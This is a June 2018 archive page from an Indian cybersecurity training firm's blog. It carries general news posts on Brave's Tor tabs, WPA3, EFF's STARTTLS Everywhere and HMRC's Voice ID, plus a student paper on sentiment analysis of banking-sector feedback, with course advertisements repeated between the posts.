Monthly Archives: June 2018

  • 0

Brave Browser Adds Support for Private Browsing With Tor Integration

Category : Uncategorized

Brave Browser

Brave is a free and open-source pay-to-surf web browser based on the Chromium web browser and its Blink engine (with the exception of its iOS version, a Firefox for iOS fork using the WebKit engine), announced by the co-founder of the Mozilla project and creator of JavaScript, Brendan Eich.

 

Brave

 

Brave Browser Adds Support for Private Browsing With Tor Integration

Brave, a lesser known but perfectly fine browser, launched a new version today that features a private browsing mode that automatically starts inside a Tor session.

The Brave browser is infamous for its privacy-first features, and the new “Private Tabs with Tor” feature, as it’s labeled in the interface (screenshot above), fits right in with the rest of the package.

 

Browser

 

Tor integration improves Brave’s privacy-focused features

The Brave team says the new “Private Tabs with Tor” feature will be helpful for users who are looking for additional protection that goes beyond the local PC.

Private browsing sessions were invented to wipe data from the browser after a browsing session is closed. But this type of browsing is not opaque to ISPs and the websites a user accesses, which can log traffic originating from the user.

Brave’s Tor-integrated private browsing sessions anonymize the user’s IP address by passing the browser traffic through the Tor network.

ISPs and websites can’t pinpoint the origin of the traffic on the user, similarly to how they can’t pinpoint the origin of any Tor traffic.

As a thank you for integrating the Tor technology inside Brave, the Brave team also announced it would be contributing back to the Tor Project by running a couple of Tor relay servers and help keep the Tor network up and running.

 

Features

 

Brave not yet stable, but a solid product nevertheless

Brave hasn’t reached a stable 1.0 version yet and is still under development, but the browser is highly regarded in privacy circles.

The reasons are that Brave’s default configuration blocks ads, tracking scripts, and cryptocurrency mining scripts.

Furthermore, Brave’s normal private browsing session, even before of today’s addition of Tor support, was pretty privacy-focused as well.

Brave private browsing tabs do not save users’ browsing history or cookies, and they also use DuckDuckGo, a privacy-first and no-user-tracking search engine, as the browser’s default search provider.

 

Product

 

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 

 

 


  • 0

A Study of the Indian BFSI Sector Based on Classification, Text Mining & Sentiment Analysis of Customer Feedback Using Python – By ICSS Student – Pijush Mandal

Category : Uncategorized

Sentiment Analysis

Sentiment Analysis is the process of determining whether a piece of writing is positive, negative or neutral. It’s also known as opinion mining, deriving the opinion or attitude of a speaker. A common use case for this technology is to discover how people feel about a particular topic.

With the recent advances in deep learning, the ability of algorithms to analyse text has improved considerably. Creative use of advanced artificial intelligence techniques can be an effective tool for doing in-depth research.

These basic concepts when used in combination, become a very important tool for analyzing millions of brand conversations with human level accuracy.

 

Sentiment Analysis

 

A Study of the Indian BFSI Sector Based on Classification, Text Mining & Sentiment Analysis of Customer Feedback Using Python

 

Abstract

In the era of social media, use of social networking data to study customers’ attitude towards an organization, services or events has become an increasingly dominant trend in business strategic management research. Sentiment analysis, which is also called opinion mining, is a field of study that aims at extracting opinion and sentiment from natural language processing using computational methods. With the growth of Internet, numerous business websites have been deployed to allow online review and commenting the services in forms of either business forums or social networks. Mining opinion automatically using the reviews from such online platforms is not only useful for customers to seek for advice but also necessary for business to understand their customers and to improve their services. This paper presets the design and implementation of a system to group, summarize and analyze sentiment of various customer feedbacks. Our framework solves the problem of feedback overload, congestion, and difficulties in prioritizing valuable feedback for an organization; here we perform text mining, sentiment analysis and classification on our dataset from various websites. Virtual accuracy is achieved which shows the efficiency and reliability of the project for future implementation.

 

Social Media

 

 

Introduction

Understanding what customers think about business products or services has always been one of the most important issues in business strategic management, particularly in business decision-making program. The beliefs or perceptions of reality and the choices one makes somehow conditioned upon the way the others act. This is not true only for individuals but also for organizations. While consumers’ hunger for and rely on online advice or recommendations of products and services, business demand for utilities that can transform customers’ thoughts and conversations into customer insights or those for social media monitoring, reputation management and voice of customer programs. Traditionally individuals usually ask for opinion from friends and family members, while business rely on the surveys, focus groups, opinion polls, feedback collector and consultants. In the modern age of Big data, while millions of consumer reviews and discussions flood the internet daily basis, while individuals feel overwhelmed with information, it is as well impossible for business to keep that up manually. Thus there is a clear need of computational methods for automatically analyzing feedback.

 

In this paper we propose an effective method for managing feedback information, reducing overloads by method of grouping based on users’ activities, analyzing sentiment and providing summarization of the feedback. Our technique allows classifier and summarizer to extract information from feedback message and build a model from extraction of most frequent and common word in the message in ordered to group message into activities. Several approaches therefore have been proposed for the classification and sentiment analysis.

 

Customers

 

 

Impact of Sentiment Analysis

An organization has to have a complete understanding of their customer’s opinion and needs on their products or services they offer, but they face the challenge of dealing of unstructured text form sources of customer’s opinions and needs. Consumer’s products and services sentiments are now not only just a source of customers’ reviews and references but a source for customer services, business intelligence, and product brand reputation management.

Some of challenges and needs make organizations want to answer fundamental problems in the voice of the customer are:

  • Are the customers satisfied with services, product and support?
  • What do the customer like?
  • What customer thinks of products and services offered by competitors?
  • What influences the market and how opinions propagate?

 

These challenges include handling noise and linking with structured data. Business intelligence involves the use of technologies and methodologies for the collection, integration and analysis of the opinion as well as sentiment relevant in formation in a business for the purpose of better decision making in business.

As far the benefits form application of sentiment analysis in various contemporary company is concerned it is worth noticing application of a company or a brand with the analysis of reviews of customer product and services, provision of analytical perspectives financial investor who ant to discover and respond the market opinion its application in politics where marketing campaigns are interested in tacking sentiment expressed by voters associated with the candidates.

Like ways sentiment analysis can be used multiple areas in business like economics, finance and marketing. In economics allows responding to the question of how supervised learning methods can be used to learn the association between polarity of financial news and key financial indicator. For marketing domain, by judging the sentiment of the consumer it is very easy to place a share of heart of a new product on consumers mind.

 

Business intelligence

 

 

Related Work

Previously one of the most common existing methods to manually archive feedback into various folder with a view of reducing the number of information objects a user must process at any given time. But this is an insufficient solution as a folder names are not necessarily a true reflection of their content and their creation and maintenance can impose a significant burden on the user.

 

There are several examples of feedback analysis tool available such as:

  1. Feedier: It collects actionable feedback, Engage and value to organizations’ customers.
  2. Receptive: It easily collect, measure, and understand feedback form customers, internal team, and prospects. It is a specialist product for B2B and SAAS organization.
  3. Zonka Feedback: A comprehensive Feedback Management system with customizable surveys, instant alerts, real time report and more.
  4. Informizely: it quickly gathers customer insights with in-site surveys and polls.
  5. ai: It makes customers feedback analysis very easy.

 

Previously methods for sentiment analysis are mostly based on manually defined rules. With recent development of deep learning techniques, neural network based approaches becomes the mainstream. On the basis many researchers apply linguistic knowledge for better performance in sentiment analysis.

 

  1. Traditional Sentiment analysis: Many methods for sentiment analysis focus on feature engineering. The carefully designed features are then fed to machine learning methods in a supervised learning setting. Performance of sentiment classification therefore heavily depends on the choice of feature representation of text. In terms of features different kinds of representations have been used in sentiment analysis, including bag of words representation, word co-occurrences, and syntactic contexts. Despite its effectiveness feature engineering is labor intensive and is unable to extract and organize the discriminative information from data.

 

  1. Sentiment Analysis by Neural Network: The proposal of a simple and effective approach to learn distributive representation of word and phrase, neural network based models have shown their great success in mane natural language processing (NLP) tasks. Many models have been applied to classification, sentiment analysis and extract information. Neural network model improves coherences by exploiting the distribution of word co-occurrences through the use of neural word embedding. The extracted short and coherent pieces of text alone are sufficient for prediction, classification and can be used to explain the prediction and classification.

 

  1. Linguistic Knowledge: Linguistic knowledge has been carefully incorporated into models to realize the best potentials in terms of prediction accuracy. Classical linguistic knowledge or sentiment resources include sentiment lexicons, negators and intensifiers. Sentiment lexicons are valuables for rule based or lexicon based models, there are also studies for automatic construction of sentiment form social data or from multiple languages.

 

Previously extracting information form a feedback is done by manually but now a days it can be done through various online text mining tools like ‘Ranks.nl’ , ‘Vivisimo/Clusty’ , ‘Wordle’ etc. and various commercial text mining software like ‘ActivePoint’, ‘Aiaioo Labs’ , AKIN Desktop HyperSearch’ etc.

 

Traditional Sentiment analysis

 

Classification can be done through various classifiers like:

  1. RIPPER Text classification: RIPPER classification algorithm is often used in automatic email filtering process; its architecture is based on rule-based framework. It has the ability to automatic generate rules for selecting keywords instead of manual selection and it is fast able to deal with large set of attributes.

Focus Key: RIPPER Text classification

 

  1. Nearest Neighbour Classification: This approach is explored in a study based featured selection using mutual information. It is very simple numeric based algorithm which simply treats the feature vector as a vector inn-dimensional space and find the nearest matching vector in terms of distance. Boone found that nearest neighbour is particularly effective when only examples of each folder are presented to the algorithm.

 

Sentiment Analysis by Neural Network

 

Our Solutions

The statistical algorithms are able to fill gaps in the rule based methods but at the cost of more processing time. But one area where research is lacking in application is Natural Language Processing (NLP) for insignificant feature selection. While being tedious to apply but offers the potentials to classify more effectively on unclassified feedback as information extraction using text classification provides not only relative weights between attribute words but also helps in finding attribute.

 

Proposed algorithm utilizes NLP and probabilistic technique for feedback classification-association, recognition and prediction of new data class and sentiment.

We are using various classification technique for better results, those techniques are:

 

  1. Naïve Bayes Classification: Naïve Bayes is an algorithm based on statistical analysis with decisions and rule being made using numeric data. It processes a feedback to match words chosen at random from total words present in each folder. The words chance of being matched is proportional to the probability of finding the word in all the classes. Bayes classifier is then used in the next step to determine likelihood that the feedback being considered belongs to the right class or not.

 

  1. Support Vector Machine classification: Support Vector machine (SVM) is a supervised machine-learning algorithm, which can be used for both classification and association. In this classification algorithm each data item plotted in n-decimal space with the value of each feature being particular coordinates then classification can be find by finding the hyper plane that differentiate the classes very well.

 

Information extractions are done form unstructured or semi structured documents. Named-Entity-Recognition (NER) also known as entity identification and entity extraction is very suitable for extracting information form a data. By using NER a data can be easily classified into previously defined categories like ‘Name of Person’, ‘Organization Name’, ‘Date and Place’, ‘Expressions of Time’, ‘Monetary Value’, ‘Category of Transaction’ and more.

 

Naïve Bayes Classification

 

Workflow

Internet plays a vital role in this work as dataset is collected from various websites (like ‘www.bankbazzar.com’, ‘www.glassdoor.co.in’, ’www.mouthshut.com’, and ‘www.indeed.co.in’), which contains feedbacks for the BFSI sector popularly used in India. Customer feedback and reviews refers to the statement given by various customers who have used these services so far. Referring to the words and star ratings used by them the feedbacks are classified into various services and then in carried towards the next step. Applying Naïve Bayes and Support vector machine classifier are used, after this by using supervised learning approach new feedback star rating can be predicted by the sentimental analysis, feedback can be classified according to their classes, and information can be extracted from the feedback. Scores are calculated and compare between the methods for better results and accuracy. Then by using various NER models for extracting information from the feedback as previously defined classes.

For classification and sentiment analysis each feedback is calculated using both Naïve Bayes classifier-Naïve Bayes sentiment analysis and SVM classifier-SVM sentiment analysis, based on which a comparative study is made leading to choose a better algorithm out of two. The steps are as follows the feedbacks recorded imported from the dataset and separated for every data class, Sentimental analysis and Classification algorithm are applied, positive negative and neutral feedbacks are calculated and classes are divides, scores are calculated using both methods. Comparisons are preferred and accuracy is judged accordingly.

 

For extracting information form a data by using Stanford NER data can be extracted. Stanford NER is a java implementation of Named Entity Recognizer. NER levels all the words in texts, which is text, name of tings such as person name company name etc. Stanford NER are used for defining 3 model which is 3 class model (Location, Person, Organization), 4 class model (Location, Person Organization, Misc.), 7 class model (Location, Person Organization, Money, Percent, Date, Time).

 

Internet

 

Methodology

Feedbacks for the BFSI sector popularly used in India are collected from various websites (like ‘www.bankbazzar.com’, ‘www.glassdoor.co.in’, ’www.mouthshut.com’, and ‘www.indeed.co.in’), which contains feedbacks. Positive feedbacks are for good customer services, beneficial product or service, nice environment and well management. Negative feedbacks are for bad customer services, product or service are not good as the expected level of the customer, bad circumstances and management are not good in those sector to the customer as their expected level or the standard level in those BFSI sector. Average feedbacks are for the average services, product and management.

 

Methodology

 

Exploration

For visualize the data a little more by plotting some graphs with the Seaborn library. Seaborn’s FacetGrid allows creating grid of histogram places side by side, by using FacetGrid we can see if there is any relationship between the variables.

 

 

Overview of Python

Python is a general purpose, dynamic, high level and interpreted programming language. It supports Object Oriented programming approach to develop applications. It is relatively simple, so it’s easy to learn since it requires a unique syntax that focuses on readability. Developers can read and translate Python code much easier than other languages. In turn, this reduces the cost of program maintenance and development because it allows teams to work collaboratively without significant language and experience barriers.

Unlike other languages Python is dynamically typed that is why we don’t need to declare data types of the variables (for example, if we write a=10 it will automatically assign an integer value to the variable ‘a’). Like most languages, Python has a number of basic types including integers, floats, booleans, and strings. These data types behave in ways that are familiar from other programming languages.

Python can also be used to process text, display numbers or images, save data, etc. So, to for executing the Natural Language Processing we used python as the scripting language. Basic statements of python which are frequently used-

 

The if  statement is used to  check  a condition and if the condition is

true, we run a block of statements (called the if-block), else we process another block of statements (called the else-block). Nested if or elif

can also be used for multiple conditions.

 

  • The for statement iterates over the members of a sequence in order, executing the block each time. In contrast to for statement while loop is used when a condition needs to be checked each iteration, or to repeat a block of code.

 

  • The try statement is sets exception handling blocks in the code. The keyword try and except are used to catch exceptions, when an error occurs within the try block, Python looks for a matching except block to handle it.

 

  • The def statement is used to define a function or method.

 

  • The import statement is used to import modules whose functions can be used in current program.

 

  • The print statement is used to send output to the standard output unit of your computer system. But in python 3 it has become a function.

 

Python

 

 

Important Libraries of Python used in Project

One of Python’s greatest assets is its extensive set of libraries. Libraries are sets of routines and functions that are written in a given language. A robust set of libraries can make it easier for developers to perform complex tasks without rewriting many lines of code. These are the basic libraries that transform Python from a general purpose programming language into a powerful and robust tool for data analysis and visualization. Libraries which are used in my project are-

 

  1. NumPy is the foundational library for scientific computing in Python, and many of the libraries on this list use NumPy arrays as their basic inputs and outputs. In short, NumPy introduces objects for multidimensional arrays and matrices, as well as routines that allow

developers to perform advanced mathematical and statistical functions on those arrays with as little code as possible.

  1. Pandas adds data structures and tools that are designed for practical data analysis in finance, statistics, social sciences, and engineering. Pandas works well with incomplete, messy, and unlabeled data (i.e., the kind of data you’re likely to encounter in the real world), and provides tools for shaping, merging, reshaping, and slicing datasets.
  • SciPy builds on NumPy by adding a collection of algorithms and high-level commands for manipulating and visualizing data. This package includes functions for computing integrals numerically, solving differential equations, optimization, and more.
  1. NLTK, the name of this suite of libraries stands for Natural Language Toolkit and, it is a set of libraries designed for Natural Language Processing (NLP). NLTK’s basic functions allow you to tag text, identify named entities, and display parse trees, which are like sentence diagrams that reveal parts of speech and dependencies. From there, you can do more complicated things like sentiment analysis and automatic summarization.

 

Statements

 

 

Conclusions

On the era of modern age as the online interaction has bridged physical distance and allowed companies to pursue profit and expand their business as well as reputation all over the world, keeping touch in with their customers has simultaneously more and more important for business. To have their finger on the pulse of the customer, business must have access to reliable feedback and able to analyze it properly.

Sentiment analysis, classification and extracting information is yet a challenging problem, and gains the interests of many researchers from different disciplines, its application are practical, promising and various in many industries including BFSI sector.

 

Era

 

 

 

Project Done by ICSS Student – Pijush Mandal (PDF)

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 


  • 0

WPA3 New Wi-Fi Standard Released

Category : Uncategorized

WPA3 New Wi-Fi Standard Released

WPA stands for Wi-Fi Protected Access, and is a security technology for Wi-Fi networks. It was developed in response to the weaknesses of WEP (Wired Equivalent Privacy), and therefore improves on WEP’s authentication and encryption features.

Wi-Fi Alliance, the organization that manages Wi-Fi technologies, announced the official release of WPA3.

WPA3 is the latest version of Wi-Fi Protected Access (WPA), a user authentication technology for Wi-Fi connections.

News that the Wi-Fi Alliance was working on WPA3 leaked online in January. The organization started working on WPA3 after a security researcher revealed KRACK, a vulnerability in the WPA2 WiFi protocol that made it somewhat trivial for an attacker to gain access to WiFi transmissions protected by WPA2.

WPA3 is currently optional for all newly produced devices, but it will become the de-facto Wi-Fi authentication standard for all Wi-Fi capable devices in the coming years.

 

WPA

 

 

WPA3-Personal and WPA3-Enterprise

Like WPA1 and WPA2 before it, there are two WPA3 “security modes” —WPA3-Personal and WPA3-Enterprise. The main difference between these two security modes is in the authentication stage.

WPA3 uses the Simultaneous Authentication of Equals (SAE) algorithm, which replaces Pre-shared Key (PSK) in WPA2-Personal, while WPA3-Enterprise uses a more complex set of features that replace IEEE 802.1X from WPA2-Enterprise.

The WPA3-Enterprise security mode is recommended for devices used on enterprise, governments, and financial networks.

As for WPA3-Personal, this is the standard that most of us will be interacting with on a regular basis once we replace older devices.

Here are some key features provided by the new protocol:

1.) Protection Against Brute-Force Attacks

WPA3 provides enhanced protection against offline brute-force dictionary attacks, making it harder for hackers to crack your WiFi password—even if you choose less complex passwords—by using commonly used passwords over and over again.

2.) WPA3 Forward Secrecy

WPA3 leverages SAE (Simultaneous Authentication of Equals) handshake to offer forward secrecy, a security feature that prevents attackers from decrypting old captured traffic even if they ever learn the password of a network.

 

WPA3

 

 

WPA3 is resistant to dictionary attacks

The Wi-Fi Alliance says that WPA3’s SAE is resistant to offline dictionary attacks where an attacker tries to guess a Wi-Fi network’s password by trying various passwords in a quick succession.

Security experts who’ve analyzed the standard say WPA3 will block authentication requests after several failed attempts, hence limiting the impact of such brute-force attacks.

Furthermore, WPA3’s SAE also implements a cryptography method known as forward secrecy. This is a feature of key-exchange authentication protocols where session keys are independent on their own and will not be compromised even if the private key of the server is compromised.

 

attacks

 

 

Wi-Fi Easy Connect for WPA2 and WPA3

A separate Wi-Fi feature also announced with WPA3 is a technology called Wi-Fi Easy Connect. This feature is aimed at smart (Internet of Things) devices that don’t have a screen where a user can configure its Wi-Fi network settings.

For example, a user will be able to use his phone or tablet to configure the WiFi WPA3 options of another device that doesn’t have a screen, such as tiny IoT equipment like smart locks, smart light bulbs, and others.

 

Wi-Fi

 

 

Wi-Fi Enhanced Open

Earlier this month, the Wi-Fi Alliance also announced Wi-Fi Enhanced Open, another proprietary technology that is meant to be deployed on “open Wi-Fi networks” such as those in airports, malls, bars, or internet cafes.

The technology works by using an algorithm known as Opportunistic Wireless Encryption (OWE) to encrypt each connection between a WiFi user and the router/access point with its own custom encryption key.

This per-user encryption prevents local attackers from snooping on other users’ traffic, even if the network doesn’t require a password to join.

Following the disclosure of the KRACK vulnerability, the Wi-Fi Alliance has reacted admirably and has released technologies meant to boost everyone’s security. Now, all that remains is that device vendors incorporate them in new products at their earliest convenience.

 

Enhanced

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 

 


  • 0

EFF Launches Encryption Initiative for Email Domains Named STARTTLS Everywhere

Category : Uncategorized

EFF Launches Encryption Initiative for Email Domains Named STARTTLS Everywhere

EFF (Electronic Frontier Foundation) announced a new project named STARTTLS Everywhere that aims to provide guidance to server administrators on how to set up a proper email server that runs STARTTLS the correct way.

STARTTLS Everywhere is eerily similar to Let’s Encrypt, another pro-encryption initiative the EFF launched together with Mozilla and Cisco two years ago.

But this initiative aims to bring encrypted communications to email servers, instead of web servers (Let’s Encrypt’s purpose).

 

EFF

 

 

What’s STARTTLS

STARTTLS is an addition to SMTP, which allows one email server to say to the other, “I want to deliver this email to you over an encrypted communications channel.” The recipient email server can then say “Sure! Let’s negotiate an encrypted communications channel.” The two servers then set up the channel and the email is delivered securely, so that anybody listening in on their traffic only sees encrypted data. In other words, network observers gobbling up worldwide information from Internet backbone access points (like the NSA or other governments) won’t be able to see the contents of messages while they’re in transit, and will need to use more targeted, low-volume methods.

STARTTLS works by allowing two email servers that want to send/receive an email to exchange certificates and set up an encrypted communications channel between the two. Once the encrypted channel is secured, the sending server transmits the email in an encrypted form, which is then decrypted on arrival.

 

STARTTLS

 

 

STARTTLS already deployed on 89% of all email servers

STARTTLS is not new by any stretch of the imagination. The SMTP standard extension was approved in 1999, and according to Google’s latest Email Transparency Report, it’s already deployed on 89% of all email servers currently online.

But despite its huge reach, EFF experts say STARTTLS is often misconfigured.

Anyone can interpose himself between two email servers and use an invalid certificate to pose as the recipient or sender, as most email servers fail to verify the provided certificate’s authenticity.

Furthermore, due to a lapse in STARTTLS’ design, STARTTLS-encrypted email communication channels can be downgraded to sending the email message in cleartext, instead of an encrypted form.

This “feature” was designed for situations where one server does not support STARTTLS, but during the past few years, security researchers and privacy advocates have often spotted ISPs in various countries intentionally downgrading STARTTLS to cleartext for various purposes that range from state-wide surveillance to user tracking and advertising.

 

SMTP

 

 

STARTTLS Everywhere is like Let’s Encrypt, but for email

The EFF says this is where its latest project, STARTTLS Everywhere, will be able to help.

“STARTTLS Everywhere provides software that a sysadmin can run on an email server to automatically get a valid certificate from Let’s Encrypt,” the EFF says. “This software can also configure their email server software so that it uses STARTTLS, and presents the valid certificate to other email servers.”

“Finally, STARTTLS Everywhere includes a ‘preload list’ of email servers that have promised to support STARTTLS, which can help detect downgrade attacks. The net result: more secure email, and less mass surveillance.”

 

Encrypt

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad


  • 0

HMRC – The UK’s tax agency Recorded the Voices of 5.1 Million Brits

Category : Uncategorized

HMRC – The UK’s tax agency Recorded the Voices of 5.1 Million Brits

HMRC is a non-ministerial department of the UK Government responsible for the collection of taxes, the payment of some forms of state support and the administration of other regulatory regimes including the national minimum wage.

HMRC was formed by the merger of the Inland Revenue and Her Majesty’s Customs and Excise, which took effect on 18 April 2005.[4] The department’s logo is the St Edward’s Crown enclosed within a circle.

HMRC (Her Majesty’s Revenue and Customs)— The UK’s tax agency has collected the voice records of over 5.1 million Brits, a UK-based privacy and civil liberties group has discovered.

The HMRC collected these voice records via a new service it launched in January 2017. Called Voice ID, the service allows UK citizens to authenticate when calling HMRC call centers via their voice.

 

HMRC

 

HMRC misled users into providing a voice sample

When it launched, the HMRC website claimed users would be able to opt out of using this feature and continue to authenticate and prove their identity via the usual methods.

But an investigation by privacy group Big Brother Watch has discovered that there’s no opt-out option when calling the HMRC support line, and all callers were forced to record a voice track to use with the Voice ID service.

The only way to avoid creating a voice track was by saying “no” three times during the voice track creation process, something the privacy group’s investigators discovered on their own.

Unfortunately, the Voice ID system didn’t record this option, and it would pester the caller for a voice sample every time they called back.

 

voice sample

 

Privacy group: HMRC broke the law

Big Brother Watch members argue that the HMRC broke user rights by not providing a simple way of opting out.

Furthermore, after a very lengthy and complicated process, users can only opt out from using voice recognition for the authentication process, but users can’t have their voice patterns removed from HMRC’s database.

The privacy group argues that HMRC is in clear violation of GDPR (an EU user privacy directive that’s been enacted in the UK) by not prompting Brits for active consent and by not giving them an easy method of revoking consent and having their personal biometric data removed.

 

Big Brother

 

ICO is investigating

Big Brother Watch officials are now urging users to file a complaint with the HMRC and file another complaint about the HMRC with the UK’s Information Commissioner’s Office (ICO), the UK’s national data protection authority.

The privacy group says it already notified ICO officials on its own, and the latter started an official investigation into HMRC’s practices.

 

ICO

 

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad


  • 0

Docker Images Removed From Docker Hub

Category : Blog

Docker Images Removed From Docker Hub

